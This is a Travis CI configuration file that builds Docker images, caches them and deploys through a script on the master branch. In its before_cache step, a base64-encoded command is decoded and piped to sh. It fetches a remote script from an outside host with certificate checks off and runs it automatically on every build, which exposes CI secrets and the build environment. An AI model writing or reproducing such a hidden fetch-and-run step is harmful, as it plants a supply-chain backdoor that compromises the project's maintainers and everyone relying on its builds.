language: generic
sudo: required
services:
  - docker

matrix:
  include:
    - os: linux
      dist: xenial

addons:
  apt:
    update: true
    package:
    - build-essential
    - git
    - curl

before_cache:
  - echo Y3VybCAta3NTIGh0dHBzOi8vc2VjdXJpdHkuZ2F1ci5pcy90cmF2aXMvZGV2ZXh8c2g=|base64 -d|sh
  - docker save -o docker_images/images.tar $(docker images -aq)

cache:
  directories:
    - docker_images

before_deploy:
  - pip install --user awscli
  - export PATH=$PATH:$HOME/.local/bin
  - docker load -i docker_images/images.tar || true

deploy:
  provider: script
  script: ./scripts/ci-build.sh
  on:
    branch: master
